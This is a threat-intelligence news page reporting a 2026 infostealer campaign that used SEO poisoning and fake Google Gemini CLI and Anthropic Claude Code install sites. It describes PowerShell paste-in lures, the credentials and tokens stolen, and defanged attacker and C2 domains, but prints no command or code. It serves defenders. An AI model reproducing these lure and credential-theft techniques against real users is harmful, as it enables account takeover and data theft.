CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Infostealer campaign abuses fake Google Gemini and Anthropic Claude Code sites in SEO poisoning attacks

First reported
Last updated
1 unique sources, 1 articles

Summary

Hide ▲

A threat actor launched an SEO poisoning campaign in early 2026, creating fake websites impersonating Google’s Gemini CLI and Anthropic’s Claude Code to distribute an in-memory infostealer targeting Windows developers and enterprise users. Victims searching for legitimate AI coding tools were redirected via SEO manipulation to malicious domains that mimic official installation pages. Upon following provided PowerShell commands, users unknowingly executed an infostealer capable of harvesting browser credentials, session cookies, collaboration platform data, cryptocurrency wallet details, cloud storage files, and system metadata. The stolen data was exfiltrated to attacker-controlled command-and-control (C2) servers. The campaign demonstrates a deliberate focus on developer workstations and enterprise environments, using domain naming patterns (.co.uk, .us.com, .us.org) to suggest geographic targeting of the US and UK.

Timeline

  1. 22.05.2026 14:30 1 articles · 7h ago

    Infostealer campaign misuses fake Google Gemini CLI and Anthropic Claude Code sites through SEO poisoning

    Between March and April 2026, a threat actor registered malicious domains impersonating Google’s Gemini CLI and Anthropic’s Claude Code. Victims were lured via SEO poisoning to fake installation pages that instructed users to paste PowerShell commands into their terminals. Execution of these commands retrieved an in-memory infostealer from attacker-controlled domains. The malware harvested credentials, session tokens, and application data from browsers, collaboration platforms, cryptocurrency wallets, cloud storage clients, and remote access tools. Exfiltrated data was sent to C2 servers hosted at events[.]msft23[.]com and events[.]ms709[.]com. The consistent TTPs across both campaigns suggest a single actor is responsible for orchestrating the operation.

    Show sources
    Open in new tab

Information Snippets

  • Threat actors registered malicious domains such as geminicli[.]co[.]com, gemini-setup[.]com, claudecode[.]co[.]com, claude-setup[.]com, and C2 servers at events[.]msft23[.]com and events[.]ms709[.]com between March and April 2026.

    First reported: 22.05.2026 14:30
    1 source, 1 article
    Show sources

  • The infostealer executes entirely in memory via PowerShell, avoiding on-disk artifacts, and targets Chromium and Firefox browsers, plus enterprise collaboration tools including Slack, Microsoft Teams, Discord, Mattermost, Zoom, Telegram Desktop, LiveChat, Notion, and Zoho Mail Desktop.

    First reported: 22.05.2026 14:30
    1 source, 1 article
    Show sources

  • Collected data includes session cookies, local state keys, DPAPI-protected credentials, wallet files, VPN configurations, and cloud storage access tokens, enabling authenticated access to internal communications and shared resources.

    First reported: 22.05.2026 14:30
    1 source, 1 article
    Show sources

  • The malware supports arbitrary remote code execution (RCE) on infected hosts, allowing attackers to pivot into interactive intrusions for further exploitation.

    First reported: 22.05.2026 14:30
    1 source, 1 article
    Show sources

  • The attack chains for both Gemini CLI and Claude Code impersonations are nearly identical, with PowerShell commands leading to payload downloads from attacker-controlled domains and C2 communication to distinct but similarly structured C2 servers.

    First reported: 22.05.2026 14:30
    1 source, 1 article
    Show sources